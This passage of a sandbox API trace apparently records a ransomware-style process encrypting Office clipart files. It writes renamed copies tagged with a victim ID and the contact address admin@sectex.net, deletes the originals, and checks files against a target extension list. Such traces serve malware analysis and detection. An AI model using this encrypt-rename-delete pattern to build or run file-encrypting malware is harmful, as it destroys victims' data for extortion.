	[0149.071] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH02298_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh02298_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3e8
	[0149.073] GetFileSizeEx (in: hFile=0x3e8, lpFileSize=0xa40ff1c | out: lpFileSize=0xa40ff1c*=5552) returned 1
	[0149.073] CloseHandle (hObject=0x3e8) returned 1
	[0149.073] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH02298_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh02298_.wmf")) returned 0x20
	[0149.073] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH02298_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh02298_.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0149.073] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH02298_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh02298_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3e8
	[0149.073] SetFilePointerEx (in: hFile=0x3e8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0149.073] SetFilePointerEx (in: hFile=0x3e8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0149.073] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH02298_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh02298_.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3ec
	[0149.074] GetLastError () returned 0x0
	[0149.074] ReadFile (in: hFile=0x3e8, lpBuffer=0xaf60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa40fed4, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesRead=0xa40fed4*=0x15b0, lpOverlapped=0x0) returned 1
	[0149.076] WriteFile (in: hFile=0x3ec, lpBuffer=0xaf60020*, nNumberOfBytesToWrite=0x15c0, lpNumberOfBytesWritten=0xa40fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesWritten=0xa40fc9c*=0x15c0, lpOverlapped=0x0) returned 1
	[0149.077] ReadFile (in: hFile=0x3e8, lpBuffer=0xaf60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa40fed4, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesRead=0xa40fed4*=0x0, lpOverlapped=0x0) returned 1
	[0149.077] WriteFile (in: hFile=0x3ec, lpBuffer=0xaf60020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa40fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesWritten=0xa40fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0149.077] SetEndOfFile (hFile=0x3ec) returned 1
	[0149.077] CloseHandle (hObject=0x3ec) returned 1
	[0149.077] SetFilePointerEx (in: hFile=0x3e8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0149.077] SetEndOfFile (hFile=0x3e8) returned 1
	[0149.079] CloseHandle (hObject=0x3e8) returned 1
	[0149.079] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH02298_.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0149.080] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH02298_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh02298_.wmf")) returned 1
	[0149.080] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH02298_.WMF") returned 63
	[0149.080] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH02298_.WMF") returned 63
	[0149.080] lstrlenW (lpString=".doc") returned 4
	[0149.080] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0149.080] lstrlenW (lpString=".docx") returned 5
	[0149.080] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0149.080] lstrlenW (lpString=".pdf") returned 4
	[0149.080] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0149.080] lstrlenW (lpString=".xls") returned 4
	[0149.080] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0149.080] lstrlenW (lpString=".xlsx") returned 5
	[0149.080] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0149.080] lstrlenW (lpString=".ppt") returned 4
	[0149.080] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0149.080] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH02298_.WMF") returned 63
	[0149.081] lstrlenW (lpString=".zip") returned 4
	[0149.081] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0149.081] lstrlenW (lpString=".rar") returned 4
	[0149.081] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0149.081] lstrlenW (lpString=".bz2") returned 4
	[0149.081] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0149.081] lstrlenW (lpString=".7z") returned 3
	[0149.081] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0149.081] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH02298_.WMF") returned 63
	[0149.081] lstrlenW (lpString=".dbf") returned 4
	[0149.081] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0149.081] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH02298_.WMF") returned 63
	[0149.081] lstrlenW (lpString=".1cd") returned 4
	[0149.081] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0149.081] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH02298_.WMF") returned 63
	[0149.081] lstrlenW (lpString=".jpg") returned 4
	[0149.081] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0149.081] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH02298_.WMF") returned 63
	[0149.081] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH02298_.WMF") returned 63
	[0149.081] lstrlenW (lpString=".doc") returned 4
	[0149.081] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0149.082] lstrlenW (lpString=".docx") returned 5
	[0149.082] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0149.082] lstrlenW (lpString=".pdf") returned 4
	[0149.082] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0149.082] lstrlenW (lpString=".xls") returned 4
	[0149.082] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0149.082] lstrlenW (lpString=".xlsx") returned 5
	[0149.082] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0149.082] lstrlenW (lpString=".ppt") returned 4
	[0149.082] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0149.082] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH02298_.WMF") returned 63
	[0149.082] lstrlenW (lpString=".zip") returned 4
	[0149.082] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0149.082] lstrlenW (lpString=".rar") returned 4
	[0149.082] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0149.082] lstrlenW (lpString=".bz2") returned 4
	[0149.082] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0149.082] lstrlenW (lpString=".7z") returned 3
	[0149.082] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0149.082] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH02298_.WMF") returned 63
	[0149.082] lstrlenW (lpString=".dbf") returned 4
	[0149.082] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0149.082] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH02298_.WMF") returned 63
	[0149.082] lstrlenW (lpString=".1cd") returned 4
	[0149.082] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0149.082] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH02298_.WMF") returned 63
	[0149.082] lstrlenW (lpString=".jpg") returned 4
	[0149.082] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0149.083] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0149.083] lstrlenW (lpString="HH02312_.WMF") returned 12
	[0149.083] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH02312_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh02312_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3e8
	[0149.083] GetFileSizeEx (in: hFile=0x3e8, lpFileSize=0xa40ff1c | out: lpFileSize=0xa40ff1c*=4970) returned 1
	[0149.083] CloseHandle (hObject=0x3e8) returned 1
	[0149.083] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH02312_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh02312_.wmf")) returned 0x20
	[0149.083] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH02312_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh02312_.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0149.083] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH02312_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh02312_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3e8
	[0149.084] SetFilePointerEx (in: hFile=0x3e8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0149.084] SetFilePointerEx (in: hFile=0x3e8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0149.084] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH02312_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh02312_.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3ec
	[0149.084] GetLastError () returned 0x0
	[0149.084] ReadFile (in: hFile=0x3e8, lpBuffer=0xaf60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa40fed4, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesRead=0xa40fed4*=0x136a, lpOverlapped=0x0) returned 1
	[0149.087] WriteFile (in: hFile=0x3ec, lpBuffer=0xaf60020*, nNumberOfBytesToWrite=0x1370, lpNumberOfBytesWritten=0xa40fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesWritten=0xa40fc9c*=0x1370, lpOverlapped=0x0) returned 1
	[0149.088] ReadFile (in: hFile=0x3e8, lpBuffer=0xaf60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa40fed4, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesRead=0xa40fed4*=0x0, lpOverlapped=0x0) returned 1
	[0149.088] WriteFile (in: hFile=0x3ec, lpBuffer=0xaf60020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa40fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesWritten=0xa40fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0149.088] SetEndOfFile (hFile=0x3ec) returned 1
	[0149.088] CloseHandle (hObject=0x3ec) returned 1
	[0149.088] SetFilePointerEx (in: hFile=0x3e8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0149.088] SetEndOfFile (hFile=0x3e8) returned 1
	[0149.090] CloseHandle (hObject=0x3e8) returned 1
	[0149.090] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH02312_.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0149.091] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH02312_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh02312_.wmf")) returned 1
	[0149.091] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH02312_.WMF") returned 63
	[0149.091] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH02312_.WMF") returned 63
	[0149.091] lstrlenW (lpString=".doc") returned 4
	[0149.091] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0149.091] lstrlenW (lpString=".docx") returned 5
	[0149.091] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0149.091] lstrlenW (lpString=".pdf") returned 4
	[0149.091] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0149.091] lstrlenW (lpString=".xls") returned 4
	[0149.091] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0149.091] lstrlenW (lpString=".xlsx") returned 5
	[0149.091] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0149.091] lstrlenW (lpString=".ppt") returned 4
	[0149.091] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0149.092] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH02312_.WMF") returned 63
	[0149.092] lstrlenW (lpString=".zip") returned 4
	[0149.092] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0149.092] lstrlenW (lpString=".rar") returned 4
	[0149.092] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0149.092] lstrlenW (lpString=".bz2") returned 4
	[0149.092] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0149.092] lstrlenW (lpString=".7z") returned 3
	[0149.092] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0149.092] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH02312_.WMF") returned 63
	[0149.092] lstrlenW (lpString=".dbf") returned 4
	[0149.092] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0149.092] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH02312_.WMF") returned 63
	[0149.092] lstrlenW (lpString=".1cd") returned 4
	[0149.092] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0149.092] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH02312_.WMF") returned 63
	[0149.092] lstrlenW (lpString=".jpg") returned 4
	[0149.092] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0149.092] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH02312_.WMF") returned 63
	[0149.092] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH02312_.WMF") returned 63
	[0149.092] lstrlenW (lpString=".doc") returned 4
	[0149.092] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0149.092] lstrlenW (lpString=".docx") returned 5
	[0149.092] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0149.092] lstrlenW (lpString=".pdf") returned 4
	[0149.092] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0149.092] lstrlenW (lpString=".xls") returned 4
	[0149.092] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0149.092] lstrlenW (lpString=".xlsx") returned 5
	[0149.092] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0149.092] lstrlenW (lpString=".ppt") returned 4
	[0149.092] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0149.093] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH02312_.WMF") returned 63
	[0149.093] lstrlenW (lpString=".zip") returned 4
	[0149.093] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0149.093] lstrlenW (lpString=".rar") returned 4
	[0149.093] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0149.093] lstrlenW (lpString=".bz2") returned 4
	[0149.093] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0149.093] lstrlenW (lpString=".7z") returned 3
	[0149.093] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0149.093] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH02312_.WMF") returned 63
	[0149.093] lstrlenW (lpString=".dbf") returned 4
	[0149.093] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0149.093] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH02312_.WMF") returned 63
	[0149.093] lstrlenW (lpString=".1cd") returned 4
	[0149.093] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0149.093] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH02312_.WMF") returned 63
	[0149.093] lstrlenW (lpString=".jpg") returned 4
	[0149.093] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0149.093] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0149.093] lstrlenW (lpString="HH02313_.WMF") returned 12
	[0149.093] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH02313_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh02313_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3e8
	[0149.094] GetFileSizeEx (in: hFile=0x3e8, lpFileSize=0xa40ff1c | out: lpFileSize=0xa40ff1c*=3082) returned 1
	[0149.094] CloseHandle (hObject=0x3e8) returned 1
	[0149.094] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH02313_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh02313_.wmf")) returned 0x20
	[0149.094] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH02313_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh02313_.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0149.094] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH02313_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh02313_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3e8
	[0149.094] SetFilePointerEx (in: hFile=0x3e8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0149.094] SetFilePointerEx (in: hFile=0x3e8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0149.094] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH02313_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh02313_.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3ec
	[0149.095] GetLastError () returned 0x0
	[0149.095] ReadFile (in: hFile=0x3e8, lpBuffer=0xaf60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa40fed4, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesRead=0xa40fed4*=0xc0a, lpOverlapped=0x0) returned 1
	[0149.361] WriteFile (in: hFile=0x3ec, lpBuffer=0xaf60020*, nNumberOfBytesToWrite=0xc10, lpNumberOfBytesWritten=0xa40fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesWritten=0xa40fc9c*=0xc10, lpOverlapped=0x0) returned 1
	[0149.362] ReadFile (in: hFile=0x3e8, lpBuffer=0xaf60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa40fed4, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesRead=0xa40fed4*=0x0, lpOverlapped=0x0) returned 1
	[0149.362] WriteFile (in: hFile=0x3ec, lpBuffer=0xaf60020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa40fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesWritten=0xa40fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0149.362] SetEndOfFile (hFile=0x3ec) returned 1
	[0149.363] CloseHandle (hObject=0x3ec) returned 1
	[0149.363] SetFilePointerEx (in: hFile=0x3e8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0149.363] SetEndOfFile (hFile=0x3e8) returned 1
	[0149.365] CloseHandle (hObject=0x3e8) returned 1
	[0149.365] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH02313_.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0149.366] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH02313_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh02313_.wmf")) returned 1
	[0149.367] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH02313_.WMF") returned 63
	[0149.367] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH02313_.WMF") returned 63
	[0149.367] lstrlenW (lpString=".doc") returned 4
	[0149.367] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0149.367] lstrlenW (lpString=".docx") returned 5
	[0149.367] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0149.367] lstrlenW (lpString=".pdf") returned 4
	[0149.367] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0149.367] lstrlenW (lpString=".xls") returned 4
	[0149.367] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0149.367] lstrlenW (lpString=".xlsx") returned 5
	[0149.367] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0149.367] lstrlenW (lpString=".ppt") returned 4
	[0149.367] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0149.367] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH02313_.WMF") returned 63
	[0149.367] lstrlenW (lpString=".zip") returned 4
	[0149.367] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0149.367] lstrlenW (lpString=".rar") returned 4
	[0149.367] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0149.367] lstrlenW (lpString=".bz2") returned 4
	[0149.367] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0149.368] lstrlenW (lpString=".7z") returned 3
	[0149.368] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0149.368] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH02313_.WMF") returned 63
	[0149.368] lstrlenW (lpString=".dbf") returned 4
	[0149.368] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0149.368] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH02313_.WMF") returned 63
	[0149.368] lstrlenW (lpString=".1cd") returned 4
	[0149.368] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0149.368] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH02313_.WMF") returned 63
	[0149.368] lstrlenW (lpString=".jpg") returned 4
	[0149.368] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0149.368] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH02313_.WMF") returned 63
	[0149.368] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH02313_.WMF") returned 63
	[0149.368] lstrlenW (lpString=".doc") returned 4
	[0149.368] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0149.368] lstrlenW (lpString=".docx") returned 5
	[0149.368] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0149.368] lstrlenW (lpString=".pdf") returned 4
	[0149.368] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0149.368] lstrlenW (lpString=".xls") returned 4
	[0149.368] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0149.368] lstrlenW (lpString=".xlsx") returned 5
	[0149.368] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0149.368] lstrlenW (lpString=".ppt") returned 4
	[0149.368] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0149.368] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH02313_.WMF") returned 63
	[0149.368] lstrlenW (lpString=".zip") returned 4
	[0149.368] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0149.368] lstrlenW (lpString=".rar") returned 4
	[0149.368] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0149.368] lstrlenW (lpString=".bz2") returned 4
	[0149.369] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0149.369] lstrlenW (lpString=".7z") returned 3
	[0149.369] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0149.369] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH02313_.WMF") returned 63
	[0149.369] lstrlenW (lpString=".dbf") returned 4
	[0149.369] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0149.369] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH02313_.WMF") returned 63
	[0149.369] lstrlenW (lpString=".1cd") returned 4
	[0149.369] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0149.369] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH02313_.WMF") returned 63
	[0149.369] lstrlenW (lpString=".jpg") returned 4
	[0149.369] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0149.369] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0149.369] lstrlenW (lpString="IN00343_.WMF") returned 12
